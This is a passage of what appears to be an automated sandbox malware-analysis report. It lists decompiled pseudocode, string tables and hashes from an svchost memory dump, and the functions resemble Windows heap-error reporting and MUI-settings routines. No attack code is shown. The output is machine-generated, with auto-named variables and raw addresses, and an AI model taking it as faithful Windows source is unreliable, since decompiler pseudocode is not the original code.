						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E03A2B150();
				} else {
					E03A2B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E03A2B150("Error code: %d - %s\n",  *0x3b15898);
				_t113 =  *0x3b158a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E03A2B150();
					} else {
						E03A2B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E03A2B150("Parameter1: %p\n",  *0x3b158a4);
				}
				_t115 =  *0x3b158a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E03A2B150();
					} else {
						E03A2B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E03A2B150("Parameter2: %p\n",  *0x3b158a8);
				}
				_t117 =  *0x3b158ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E03A2B150();
					} else {
						E03A2B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E03A2B150("Parameter3: %p\n",  *0x3b158ac);
				}
				_t119 =  *0x3b158b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E03A2B150();
					} else {
						E03A2B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x3b158b4);
					E03A2B150("Last known valid blocks: before - %p, after - %p\n",  *0x3b158b0);
				} else {
					_t120 =  *0x3b158b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E03A2B150();
				} else {
					E03A2B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E03A2B150("Stack trace available at %p\n", 0x3b158c0);
			}











                                          0x03ae1c10
                                          0x03ae1c16
                                          0x03ae1c1e
                                          0x03ae1c3d
                                          0x03ae1c3e
                                          0x03ae1c20
                                          0x03ae1c35
                                          0x03ae1c3a
                                          0x03ae1c44
                                          0x03ae1c55
                                          0x03ae1c5a
                                          0x03ae1c65
                                          0x03ae1c67
                                          0x00000000
                                          0x03ae1c6e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03ae1c67
                                          0x03ae1cdc
                                          0x03ae1ce5
                                          0x03ae1d04
                                          0x03ae1d05
                                          0x03ae1ce7
                                          0x03ae1cfc
                                          0x03ae1d01
                                          0x03ae1d0b
                                          0x03ae1d17
                                          0x03ae1d1f
                                          0x03ae1d25
                                          0x03ae1d30
                                          0x03ae1d4f
                                          0x03ae1d50
                                          0x03ae1d32
                                          0x03ae1d47
                                          0x03ae1d4c
                                          0x03ae1d61
                                          0x03ae1d67
                                          0x03ae1d68
                                          0x03ae1d6e
                                          0x03ae1d79
                                          0x03ae1d98
                                          0x03ae1d99
                                          0x03ae1d7b
                                          0x03ae1d90
                                          0x03ae1d95
                                          0x03ae1daa
                                          0x03ae1db0
                                          0x03ae1db1
                                          0x03ae1db7
                                          0x03ae1dc2
                                          0x03ae1de1
                                          0x03ae1de2
                                          0x03ae1dc4
                                          0x03ae1dd9
                                          0x03ae1dde
                                          0x03ae1df3
                                          0x03ae1df9
                                          0x03ae1dfa
                                          0x03ae1e00
                                          0x03ae1e0a
                                          0x03ae1e13
                                          0x03ae1e32
                                          0x03ae1e33
                                          0x03ae1e15
                                          0x03ae1e2a
                                          0x03ae1e2f
                                          0x03ae1e39
                                          0x03ae1e4a
                                          0x03ae1e02
                                          0x03ae1e02
                                          0x03ae1e08
                                          0x00000000
                                          0x00000000
                                          0x03ae1e08
                                          0x03ae1e5b
                                          0x03ae1e7a
                                          0x03ae1e7b
                                          0x03ae1e5d
                                          0x03ae1e72
                                          0x03ae1e77
                                          0x03ae1e95

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                          • API String ID: 0-2897834094
                                          • Opcode ID: ad8643b8184a82dd7cc84a98f213708759863ecdb3013f8c99b5b24c1c44b986
                                          • Instruction ID: 80f1a0b7ff23232008c96c36c8ea9da5cd768ac36f9083981a2012f03470454f
                                          • Opcode Fuzzy Hash: ad8643b8184a82dd7cc84a98f213708759863ecdb3013f8c99b5b24c1c44b986
                                          • Instruction Fuzzy Hash: A961B836521274DFC211EB8CD589E34B7B4FB48A34B4D806FF80AAF751D6749C608B29
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A33D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E03A33D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E03A31B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E03A31B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E03A31B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E03A31B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E03A31B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L03A44620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E03A6F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E03A71370(_t276, 0x3a04e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E03A6BB40(0,  &_v68, _t170);
									if(L03A343C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E03A6BB40(_t257,  &_v68, _t243);
								if(L03A343C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E03A71370(_t278, 0x3a04e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L03A44620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E03A6F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E03A71370(_v16, 0x3a04e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E03A6BB40(_t262,  &_v68, _t244);
								if(L03A343C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E03A71370(_t282, 0x3a04e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E03A6BB40(_t262,  &_v68, _t201);
							if(L03A343C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L03A44620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E03A6F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E03A71370(_t280, 0x3a04e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E03A6BB40(_t267,  &_v68, _t245);
							if(L03A343C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E03A71370(_t284, 0x3a04e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E03A6BB40(_t267,  &_v68, _t224);
						if(L03A343C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                          0x03a33d3c
                                          0x03a33d42
                                          0x03a33d44
                                          0x03a33d46
                                          0x03a33d49
                                          0x03a33d4c
                                          0x03a33d4f
                                          0x03a33d52
                                          0x03a33d55
                                          0x03a33d58
                                          0x03a33d5b
                                          0x03a33d5f
                                          0x03a33d61
                                          0x03a33d66
                                          0x03a88213
                                          0x03a88218
                                          0x03a34085
                                          0x03a34088
                                          0x03a3408e
                                          0x03a34094
                                          0x03a3409a
                                          0x03a340a0
                                          0x03a340a6
                                          0x03a340a9
                                          0x03a340af
                                          0x03a340b6
                                          0x03a340bd
                                          0x03a340bd
                                          0x03a33d83
                                          0x03a8821f
                                          0x03a88229
                                          0x03a88238
                                          0x03a88238
                                          0x03a8823d
                                          0x03a8823d
                                          0x03a33da0
                                          0x03a33daf
                                          0x03a33db5
                                          0x03a33dba
                                          0x03a33dba
                                          0x03a33dd4
                                          0x03a33e94
                                          0x03a33eab
                                          0x03a33f6d
                                          0x03a33f84
                                          0x03a3406b
                                          0x03a3406b
                                          0x03a3406e
                                          0x03a3406e
                                          0x03a34070
                                          0x03a34074
                                          0x03a88351
                                          0x03a88351
                                          0x03a3407a
                                          0x03a3407f
                                          0x03a8835d
                                          0x03a88370
                                          0x03a88377
                                          0x03a88379
                                          0x03a8837c
                                          0x03a8837c
                                          0x03a8835d
                                          0x00000000
                                          0x03a3407f
                                          0x03a33f8a
                                          0x03a33f8d
                                          0x03a33f90
                                          0x03a33f95
                                          0x03a8830d
                                          0x03a8830f
                                          0x03a33f9b
                                          0x03a33fac
                                          0x03a33fae
                                          0x03a33fb1
                                          0x03a33fb1
                                          0x03a33fb6
                                          0x03a88317
                                          0x03a8831a
                                          0x00000000
                                          0x03a33fbc
                                          0x03a33fc1
                                          0x03a33fc9
                                          0x03a33fd7
                                          0x03a33fda
                                          0x03a33fdd
                                          0x03a34021
                                          0x03a34021
                                          0x03a34029
                                          0x03a34030
                                          0x03a34044
                                          0x03a34046
                                          0x03a34046
                                          0x03a34044
                                          0x03a34049
                                          0x03a88327
                                          0x03a88334
                                          0x03a88339
                                          0x03a8833c
                                          0x03a3404f
                                          0x03a3404f
                                          0x03a3404f
                                          0x03a34051
                                          0x03a34056
                                          0x03a34063
                                          0x03a34063
                                          0x03a34068
                                          0x00000000
                                          0x03a34068
                                          0x03a33fdf
                                          0x03a33fe2
                                          0x03a33fe4
                                          0x03a33fe7
                                          0x03a33fef
                                          0x03a34003
                                          0x03a34005
                                          0x03a34005
                                          0x03a3400c
                                          0x03a34013
                                          0x03a34016
                                          0x03a34017
                                          0x03a3401b
                                          0x03a3401e
                                          0x00000000
                                          0x03a3401e
                                          0x03a33fb6
                                          0x03a33eb1
                                          0x03a33eb4
                                          0x03a33eb7
                                          0x03a33ebc
                                          0x03a882a9
                                          0x03a882ab
                                          0x03a33ec2
                                          0x03a33ed3
                                          0x03a33ed5
                                          0x03a33ed8
                                          0x03a33ed8
                                          0x03a33edd
                                          0x03a882b3
                                          0x03a882b6
                                          0x00000000
                                          0x03a33ee3
                                          0x03a33ee8
                                          0x03a33eed
                                          0x03a33ef0
                                          0x03a33ef3
                                          0x03a33f02
                                          0x03a33f05
                                          0x03a33f08
                                          0x03a882c0
                                          0x03a882c3
                                          0x03a882c5
                                          0x03a882c8
                                          0x03a882d0
                                          0x03a882e4
                                          0x03a882e6
                                          0x03a882e6
                                          0x03a882ed
                                          0x03a882f4
                                          0x03a882f7
                                          0x03a882f8
                                          0x03a882fc
                                          0x03a882ff
                                          0x03a882ff
                                          0x03a33f0e
                                          0x03a33f11
                                          0x03a33f16
                                          0x03a33f1d
                                          0x03a33f31
                                          0x03a88307
                                          0x03a88307
                                          0x03a33f31
                                          0x03a33f39
                                          0x03a33f48
                                          0x03a33f4d
                                          0x03a33f50
                                          0x03a33f50
                                          0x03a33f53
                                          0x03a33f58
                                          0x03a33f65
                                          0x03a33f65
                                          0x03a33f6a
                                          0x00000000
                                          0x03a33f6a
                                          0x03a33edd
                                          0x03a33dda
                                          0x03a33ddd
                                          0x03a33de0
                                          0x03a33de5
                                          0x03a88245
                                          0x03a33deb
                                          0x03a33df7
                                          0x03a33dfc
                                          0x03a33dfe
                                          0x03a33e01
                                          0x03a33e01
                                          0x03a33e06
                                          0x03a8824d
                                          0x03a8824f
                                          0x03a88254
                                          0x00000000
                                          0x03a33e0c
                                          0x03a33e11
                                          0x03a33e16
                                          0x03a33e19
                                          0x03a33e29
                                          0x03a33e2c
                                          0x03a33e2f
                                          0x03a8825c
                                          0x03a8825f
                                          0x03a88261
                                          0x03a88264
                                          0x03a8826c
                                          0x03a88280
                                          0x03a88282
                                          0x03a88282
                                          0x03a88289
                                          0x03a88290
                                          0x03a88293
                                          0x03a88294
                                          0x03a88298
                                          0x03a8829b
                                          0x03a8829b
                                          0x03a33e35
                                          0x03a33e38
                                          0x03a33e3d
                                          0x03a33e44
                                          0x03a33e58
                                          0x03a882a3
                                          0x03a882a3
                                          0x03a33e58
                                          0x03a33e60
                                          0x03a33e6f
                                          0x03a33e74
                                          0x03a33e77
                                          0x03a33e77
                                          0x03a33e7a
                                          0x03a33e7f
                                          0x03a33e8c
                                          0x03a33e8c
                                          0x03a33e91
                                          0x00000000
                                          0x03a33e91

                                          Strings
                                          • WindowsExcludedProcs, xrefs: 03A33D6F
                                          • Kernel-MUI-Language-Allowed, xrefs: 03A33DC0
                                          • Kernel-MUI-Number-Allowed, xrefs: 03A33D8C
                                          • Kernel-MUI-Language-SKU, xrefs: 03A33F70
                                          • Kernel-MUI-Language-Disallowed, xrefs: 03A33E97
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 0-258546922
                                          • Opcode ID: 1de64113479e60932c101a4f1e86c7e0de7ab70e5116a1b57b786ff3959cc175
                                          • Instruction ID: 6f9fc7897c7eb6d72f6bc7451749e86cf87b7c60d62e317ec55241ea23b28c7f
                                          • Opcode Fuzzy Hash: 1de64113479e60932c101a4f1e86c7e0de7ab70e5116a1b57b786ff3959cc175
                                          • Instruction Fuzzy Hash: 97F12876D00619EFCB15DF99CA80AEEBBB9FF49750F54006BE515AB250E7349E00CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A240E1 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 29%
                                          			E03A240E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E03A2B150();
					} else {
						E03A2B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E03A2B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E03A2B150(", passed to %s", _t29);
					}
					_push("\n");
					E03A2B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x3b16378 = 1;
						asm("int3");
						 *0x3b16378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                          0x03a240e6
                                          0x03a240e8
                                          0x03a240f1
                                          0x03a8042d
                                          0x03a8044c
                                          0x03a80451
                                          0x03a8042f
                                          0x03a80444
                                          0x03a80449
                                          0x03a8045d
                                          0x03a80466
                                          0x03a8046e
                                          0x03a80474
                                          0x03a80475
                                          0x03a8047a
                                          0x03a8048a
                                          0x03a8048c
                                          0x03a80493
                                          0x03a80494
                                          0x03a80494
                                          0x00000000
                                          0x03a8049b
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                          • API String ID: 0-188067316
                                          • Opcode ID: 416654df8fd829d65c5b8d774741afdecec4e636155df8f12810216869bbae9e
                                          • Instruction ID: 0902b18ae87038e55c58bf54abaa8648e1923178cb675e41fa668d20c90e98ab
                                          • Opcode Fuzzy Hash: 416654df8fd829d65c5b8d774741afdecec4e636155df8f12810216869bbae9e
                                          • Instruction Fuzzy Hash: 5C012436285350BFD229E76CB50EF56BBB4EB01B34F19806BF00A4B792CAA49484C220
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A4A229 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 69%
                                          			E03A4A229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E03A4DF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E03A69730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E03AEA80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E03A69660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E03A2B150();
					} else {
						E03A2B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E03A2B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E03A47D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E03AE138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E03A47D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E03A47D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E03AE1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E03A47D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E03A47D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E03AE1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E03A7D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                          0x03a4a229
                                          0x03a4a231
                                          0x03a4a23f
                                          0x03a4a242
                                          0x03a4a244
                                          0x03a4a24c
                                          0x03a4a255
                                          0x03a4a25a
                                          0x03a4a25f
                                          0x03a91c76
                                          0x03a91c78
                                          0x03a91c7e
                                          0x03a91c7f
                                          0x03a91c81
                                          0x03a91c82
                                          0x03a91c84
                                          0x03a91c89
                                          0x03a91c8b
                                          0x03a91c9e
                                          0x03a91c9e
                                          0x03a91cab
                                          0x03a91cb2
                                          0x00000000
                                          0x03a91cb2
                                          0x03a91c8d
                                          0x03a91c92
                                          0x00000000
                                          0x00000000
                                          0x03a91c94
                                          0x03a91c98
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a91c98
                                          0x03a4a265
                                          0x03a4a265
                                          0x03a4a266
                                          0x03a4a26f
                                          0x03a4a270
                                          0x03a4a276
                                          0x03a4a277
                                          0x03a4a279
                                          0x03a4a27e
                                          0x03a4a282
                                          0x03a91db5
                                          0x03a91dbb
                                          0x03a91dc1
                                          0x03a91dc5
                                          0x03a91de4
                                          0x03a91de9
                                          0x03a91dc7
                                          0x03a91ddc
                                          0x03a91de1
                                          0x03a91def
                                          0x03a91df3
                                          0x03a91df7
                                          0x03a91dfe
                                          0x03a91e06
                                          0x03a4a302
                                          0x03a4a308
                                          0x03a4a308
                                          0x03a4a288
